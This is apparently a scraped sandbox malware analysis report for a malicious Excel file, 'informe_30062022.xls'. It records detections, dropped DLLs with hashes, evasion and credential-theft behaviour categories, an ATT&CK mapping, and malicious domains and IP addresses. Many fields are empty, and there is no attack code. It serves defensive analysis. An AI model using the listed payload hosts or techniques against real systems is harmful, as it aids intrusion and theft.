Source: | Code function: | 4_2_0028632C | |
Source: | Code function: | 4_2_0027C720 | |
Source: | Code function: | 4_2_00279720 | |
Source: | Code function: | 4_2_0028BD20 | |
Source: | Code function: | 4_2_00286520 | |
Source: | Code function: | 4_2_0026D92C | |
Source: | Code function: | 4_2_0028093C | |
Source: | Code function: | 4_2_00286F3C | |
Source: | Code function: | 4_2_0027A130 | |
Source: | Code function: | 4_2_0026D300 | |
Source: | Code function: | 4_2_00283304 | |
Source: | Code function: | 4_2_00262708 | |
Source: | Code function: | 4_2_0027EB08 | |
Source: | Code function: | 4_2_00284918 | |
Source: | Code function: | 4_2_00273D1C | |
Source: | Code function: | 4_2_0027F764 | |
Source: | Code function: | 4_2_0028796C | |
Source: | Code function: | 4_2_00270B60 | |
Source: | Code function: | 4_2_0026CB6C | |
Source: | Code function: | 4_2_0026DB74 | |
Source: | Code function: | 4_2_0028B570 | |
Source: | Code function: | 4_2_00276978 | |
Source: | Code function: | 4_2_00270578 | |
Source: | Code function: | 4_2_00277144 | |
Source: | Code function: | 4_2_00263F40 | |
Source: | Code function: | 4_2_00286B40 | |
Source: | Code function: | 4_2_00264948 | |
Source: | Code function: | 4_2_0028155C | |
Source: | Code function: | 4_2_00268F5C | |
Source: | Code function: | 4_2_00279D5C | |
Source: | Code function: | 4_2_0027B558 | |
Source: | Code function: | 4_2_00289DA8 | |
Source: | Code function: | 4_2_002727A4 | |
Source: | Code function: | 4_2_002693AC | |
Source: | Code function: | 4_2_0027C5AC | |
Source: | Code function: | 4_2_0027EFAC | |
Source: | Code function: | 4_2_0026B1A8 | |
Source: | Code function: | 4_2_00267BB4 | |
Source: | Code function: | 4_2_00273BB4 | |
Source: | Code function: | 4_2_00280DBC | |
Source: | Code function: | 4_2_00277DB0 | |
Source: | Code function: | 4_2_002729BC | |
Source: | Code function: | 4_2_0026ED84 | |
Source: | Code function: | 4_2_0026F580 | |
Source: | Code function: | 4_2_00271B88 | |
Source: | Code function: | 4_2_00272F94 | |
Source: | Code function: | 4_2_00274594 | |
Source: | Code function: | 4_2_00276594 | |
Source: | Code function: | 4_2_00288990 | |
Source: | Code function: | 4_2_00265198 | |
Source: | Code function: | 4_2_0026AFE4 | |
Source: | Code function: | 4_2_0026B3E4 | |
Source: | Code function: | 4_2_002793E0 | |
Source: | Code function: | 4_2_002799F4 | |
Source: | Code function: | 4_2_002813FC | |
Source: | Code function: | 4_2_002631F0 | |
Source: | Code function: | 4_2_0027D9C4 | |
Source: | Code function: | 4_2_00262DC0 | |
Source: | Code function: | 4_2_0026DFCC | |
Source: | Code function: | 4_2_0026EFCC | |
Source: | Code function: | 4_2_002807D0 | |
Source: | Code function: | 4_2_00283DD4 | |
Source: | Code function: | 4_2_002625D8 | |
Source: | Code function: | 4_2_0027ABD8 | |
Source: | Code function: | 5_2_001D0000 | |
Source: | Code function: | 5_2_02137E28 | |
Source: | Code function: | 5_2_0213B6BC | |
Source: | Code function: | 5_2_02115B18 | |
Source: | Code function: | 5_2_0212EB08 | |
Source: | Code function: | 5_2_02128B3C | |
Source: | Code function: | 5_2_02121B88 | |
Source: | Code function: | 5_2_02127414 | |
Source: | Code function: | 5_2_0212A804 | |
Source: | Code function: | 5_2_0212FC70 | |
Source: | Code function: | 5_2_0211CCC8 | |
Source: | Code function: | 5_2_0212BD64 | |
Source: | Code function: | 5_2_02123210 | |
Source: | Code function: | 5_2_02123610 | |
Source: | Code function: | 5_2_02123E18 | |
Source: | Code function: | 5_2_0212F61C | |
Source: | Code function: | 5_2_02132E04 | |
Source: | Code function: | 5_2_02135E30 | |
Source: | Code function: | 5_2_0212F238 | |
Source: | Code function: | 5_2_02132638 | |
Source: | Code function: | 5_2_0212D620 | |
Source: | Code function: | 5_2_0212762C | |
Source: | Code function: | 5_2_0211E254 | |
Source: | Code function: | 5_2_0212D254 | |
Source: | Code function: | 5_2_0211FE58 | |
Source: | Code function: | 5_2_0212EE5C | |
Source: | Code function: | 5_2_02139A40 | |
Source: | Code function: | 5_2_0211F290 | |
Source: | Code function: | 5_2_0213BE90 | |
Source: | Code function: | 5_2_0211B698 | |
Source: | Code function: | 5_2_02116698 | |
Source: | Code function: | 5_2_02113A9C | |
Source: | Code function: | 5_2_0213369C | |
Source: | Code function: | 5_2_02120680 | |
Source: | Code function: | 5_2_021246B4 | |
Source: | Code function: | 5_2_0211B2BC | |
Source: | Code function: | 5_2_021376A4 | |
Source: | Code function: | 5_2_021316A8 | |
Source: | Code function: | 5_2_0211FAD0 | |
Source: | Code function: | 5_2_02129EC0 | |
Source: | Code function: | 5_2_02130AC4 | |
Source: | Code function: | 5_2_02134EF4 | |
Source: | Code function: | 5_2_021312FC | |
Source: | Code function: | 5_2_02132AFC | |
Source: | Code function: | 5_2_021172E0 | |
Source: | Code function: | 5_2_021136E0 |
Source: | Virustotal: | ||
Source: | Metadefender: | ||
Source: | ReversingLabs: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Binary string: |
Source: | Classification label: |
Source: | Code function: | 3_2_00000001800016A8 |
Source: | File read: | Jump to behavior |
Source: | OLE indicator, Workbook stream: | ||
Source: | OLE indicator, Workbook stream: | ||
Source: | OLE indicator, Workbook stream: |
Source: | Code function: | 3_2_0215A804 |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Source: | Code function: | 3_2_02148C7D | |
Source: | Code function: | 5_2_02118C7D | |
Source: | Code function: | 8_2_00288C7D | |
Source: | Code function: | 10_2_020E8C7D |
Source: | Process created: |
Persistence and Installation Behavior |
---|
Source: | Process created: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival |
---|
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Code function: | 3_2_0000000180006484 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | |||
Source: | Thread sleep time: |
Source: | Code function: | 3_2_0215DD40 | |
Source: | Code function: | 5_2_0212DD40 |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 4_2_0027C9F0 | |
Source: | Code function: | 6_2_0215C9F0 | |
Source: | Code function: | 9_2_020EC9F0 | |
Source: | Code function: | 11_2_0029C9F0 |
Source: | File Volume queried: | Jump to behavior | ||
Source: | File Volume queried: | Jump to behavior | ||
Source: | File Volume queried: | Jump to behavior | ||
Source: | File Volume queried: | Jump to behavior | ||
Source: | File Volume queried: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Code function: | 3_2_0000000180007A68 |
Source: | Code function: | 3_2_000000018000EB10 |
Source: | Code function: | 3_2_000000018000671C |
Source: | Code function: | 3_2_000000018000766C |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior | ||
Source: | Network Connect: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 3_2_0000000180006EDC |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 211 Windows Management Instrumentation | Path Interception | 111 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 2 Scripting | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 2 Scripting | LSASS Memory | 1 System Service Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 21 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 43 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 File Deletion | NTDS | 117 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 131 Masquerading | LSA Secrets | 141 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | 14 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 12 Virtualization/Sandbox Evasion | Cached Domain Credentials | 12 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 111 Process Injection | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Hidden Files and Directories | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Regsvr32 | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
59% | Virustotal | Browse | ||
36% | Metadefender | Browse | ||
57% | ReversingLabs | Document-Excel.Trojan.Abracadabra |
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1215461 | Download File | ||
100% | Avira | HEUR/AGEN.1215461 | Download File | ||
100% | Avira | HEUR/AGEN.1215461 | Download File | ||
100% | Avira | HEUR/AGEN.1215461 | Download File |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
11% | Virustotal | Browse | ||
16% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
komunitas.blog.gunadarma.ac.id | 118.98.72.14 | true | false |
| unknown |
hepsisifa.com | 213.128.75.146 | true | true |
| unknown |
aysbody.com | 212.98.224.29 | true | false |
| unknown |
www.hayalkatibi.com | 185.165.46.170 | true | false | unknown | |
fikti.bem.gunadarma.ac.id | unknown | unknown | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false | high | |||
true |
| unknown | ||
false | high | |||
true |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
174.138.33.49 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true | |
212.98.224.29 | aysbody.com | Turkey | 15924 | BORUSANTELEKOM-ASTR | false | |
213.128.75.146 | hepsisifa.com | Turkey | 42926 | RADORETR | true | |
185.165.46.170 | www.hayalkatibi.com | Georgia | 59447 | SAYFANETTR | false | |
118.98.72.14 | komunitas.blog.gunadarma.ac.id | Indonesia | 7713 | TELKOMNET-AS-APPTTelekomunikasiIndonesiaID | false | |
180.250.21.2 | unknown | Indonesia | 17974 | TELKOMNET-AS2-APPTTelekomunikasiIndonesiaID | true |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 655637 |
Start date and time: 01/07/202211:36:59 | 2022-07-01 11:36:59 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 9m 49s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | informe_30062022.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 28 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLS@30/27@4/6 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe
- Excluded IPs from analysis (whitelisted): 209.197.3.8
- Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
11:38:20 | API Interceptor | |
11:38:27 | API Interceptor | |
11:38:55 | API Interceptor | |
11:38:59 | API Interceptor | |
11:39:01 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
174.138.33.49 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
komunitas.blog.gunadarma.ac.id | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
BORUSANTELEKOM-ASTR | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
DIGITALOCEAN-ASNUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
eb88d0b3e1961a0562f006e5ce2a0b87 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 61712 |
Entropy (8bit): | 7.995044632446497 |
Encrypted: | true |
SSDEEP: | 1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx |
MD5: | 589C442FC7A0C70DCA927115A700D41E |
SHA1: | 66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31 |
SHA-256: | 2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A |
SHA-512: | 1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.1297566246827087 |
Encrypted: | false |
SSDEEP: | 6:kK5bg+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:BbgNkPlE99SNxAhUeE1 |
MD5: | 7CC0A7B44DCC2C80F12156ADDC60CA5F |
SHA1: | 5D2EC6421C796EE884CBFCE7AB0C43F43F33EAA5 |
SHA-256: | 447BDA054ED8493DFE89DD1AB7A0BDBBA99AD763B0AB41BB79DC84EF1BEA33E2 |
SHA-512: | 590AE4B9EB7EBB729672C6AA5355F8405A832E0CE527C2245D44B96A96F9A58A47F807C98142884FB22C1BFE80FD41209D460A535BA4178D1DB62E6014329F8E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LEPqPJpt4Gbr8BHAn[1].dll
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.16575875022004 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DrOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq++ssGHtUxQ8ORqlGPkEUa |
MD5: | 5036455CEB237611F6F132F0B53D7A36 |
SHA1: | 1E9070ABE52AE5BB9673C8DE31D1171EA39A69CF |
SHA-256: | 98D16D9F6DBEAAE1C48552D781B477923A5269061926528A28AF8205EE61B056 |
SHA-512: | 2D3DA0F65C82AEF0076F898C0CCE2FEB67FF348473A8FD8BDDC4F5D2021A359B9917084AFC7DD712A788256CB1B6FB78F98EA66149408C7DFB2EC36FA12AEAAC |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Wli[1].dll
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.1657581863798265 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DcOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq+ZssGHtUxQ8ORqlGPkEUa |
MD5: | A86AC8A994FD225710B373EDB7B5A575 |
SHA1: | DF8754FECA62D5832D21B2B2F3EAE587224DF47C |
SHA-256: | 0DFDD744F867D1C76767FB892005BFAEF321EEAAED3AB6A875362899AA7D0562 |
SHA-512: | 28D14E48653BCB7FE06428EA8974F8518E835504E93F3A3C3E77B3646867FF93230CEC3683BFB8B923BD92918A187BBED87B8418776B2BBCF40C2750A54A5311 |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pgsfQZfg7Qt[1].dll
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 551936 |
Entropy (8bit): | 7.165762249523314 |
Encrypted: | false |
SSDEEP: | 12288:7k4q+DfOsJaGHtKbEuDQ8O71JklGPkEJmWTue:7fq+assGHtUxQ8ORqlGPkEUa |
MD5: | 01D64AC21455EF67D9D04DAC9A4276D7 |
SHA1: | 15FDB2B45F2554D76577E93B5799DF38CAC823C1 |
SHA-256: | EA4EA1CDF2694173E9991A63A5B4AE581102AAD6A903713CC4266EF30358DF90 |
SHA-512: | A39CB71D576430B6F38E08819F4FC6C096F10046400DAE7D687F3503D7D22AB2144D991C2D90F46461AF712B8FA6AE2F204750C4F00C33D810F1D9879D19DC44 |
Malicious: | true |
Preview: |
